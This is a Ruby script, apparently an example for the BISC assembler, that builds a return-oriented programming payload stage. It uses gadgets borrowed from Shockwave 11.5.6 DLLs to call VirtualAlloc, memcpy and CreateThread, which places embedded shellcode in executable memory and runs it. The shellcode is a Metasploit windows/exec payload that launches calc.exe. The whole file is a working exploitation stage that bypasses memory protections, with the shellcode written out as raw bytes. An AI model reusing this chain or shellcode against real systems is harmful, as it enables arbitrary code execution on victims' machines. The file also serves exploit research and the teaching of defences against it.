CreateThreadStage.rb

#!/usr/bin/env ruby
#
# This return-oriented payload stage copies two embedded
# traditional machine code payloads into executable memory, creates a
# new thread to execute the "child" payload, and then executes the
# "parent" payload in the current thread.
#
# It was written using borrowable instructions from SwDir.dll,
# dirapi.dll, and iml32.dll from Shockwave 11.5.6r606.
#

lib = File.expand_path('../../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)

require 'bisc'

bisc = BISC::Assembler.new(ARGV)

#
# Allocate storage for any variables used
#
pESP = bisc.allocate(4)

#
# Get and store pointer to the beginning of 'program' at pESP
#
GetESP = [
  "POP EAX", pESP,
  "POP EDX", "MOV [EBX], EAX",
  "MOV [EAX], EDX",
  "POP ECX", 4,
  "ADD EAX, ECX",
  "POP EDX", "XCHG EAX, ESP",
  "MOV [EAX], EDX",

  "POP EAX", pESP,
  "POP EBX", pESP,
  "XCHG EAX, ESP"
]


lppVirtualAlloc = bisc.get_iat_pointer("KERNEL32.DLL", "VirtualAlloc")
lppmemcpy = bisc.get_iat_pointer("MSVCR71.DLL", "memcpy")
ppfnCreateThread = bisc.get_iat_pointer("KERNEL32.DLL", "CreateThread")
lpMem = bisc.allocate(4)
lpThreadId = bisc.allocate(4)

#
# "Parent" payload
#
parent = "\xeb\xfe"

#
# "Child" payload
#
# MSF CMD=calc.exe windows/exec
#
child =
  "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
  "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
  "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
  "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
  "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
  "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
  "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
  "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
  "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
  "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
  "\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" +
  "\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95" +
  "\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +
  "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e" +
  "\x65\x78\x65\x00"

payloads_length = parent.length + child.length

Main = [
  "POP ECX", lppVirtualAlloc,
  "MOV EAX, [ECX]",
  "PUSH EAX", "NOP", 0, 65535, 0x1000, 0x40,
  "POP EBX", lpMem,
  "MOV [EBX], EAX",

  # Point EDI to value on stack to overwrite
  "POP ECX", pESP,
  "MOV EAX, [ECX]",
  "POP ECX", 42*4,  # This is the offset from Main to target value (0xdeadbeef)
  "ADD EAX, ECX",
  "XCHG EAX, EDI",

  # Write allocated address as 1st arg to memcpy
  "POP ECX", lpMem,
  "MOV EAX, [ECX]",
  "MOV [EDI], EAX",

  # Point EDI to value on stack to overwrite
  "POP ECX", pESP,
  "MOV EAX, [ECX]",
  "POP ECX", 43*4,  # This is the offset from Main to target value (0xdeadbeef)
  "ADD EAX, ECX",
  "XCHG EAX, EDI",

  # Write traditional payload address as 2nd arg to memcpy
  "POP ECX", pESP,
  "MOV EAX, [ECX]",
  "POP ECX", 75*4,  # Pointer to machine-code payloads that follow
  "ADD EAX, ECX",
  "MOV [EDI], EAX",

  "POP ECX", lppmemcpy,
  "MOV EAX, [ECX]",
  "PUSH EAX", "ADD ESP, 12", 0xdeadbeef, 0xdeadbeef, payloads_length,

  # Point EDI to value on stack to overwrite
  "POP ECX", pESP,
  "MOV EAX, [ECX]",
  "POP ECX", 66*4,  # This is the offset from Main to target value (0xdeadbeef)
  "ADD EAX, ECX",
  "XCHG EAX, EDI",

  "POP ECX", lpMem,
  "MOV EAX, [ECX]",
  "POP ECX", parent.length,
  "ADD EAX, ECX",
  "MOV [EDI], EAX",

  # Create new thread to execute child payload
  "POP ECX", ppfnCreateThread,
  "MOV EAX, [ECX]",
  "PUSH EAX", "NOP", 0, 0, 0xdeadbeef, 0, 0, lpThreadId,

  # Call parent payload
  "POP ECX", lpMem,
  "MOV EAX, [ECX]",
  "PUSH EAX"
]

print bisc.assemble(GetESP + Main) + parent + child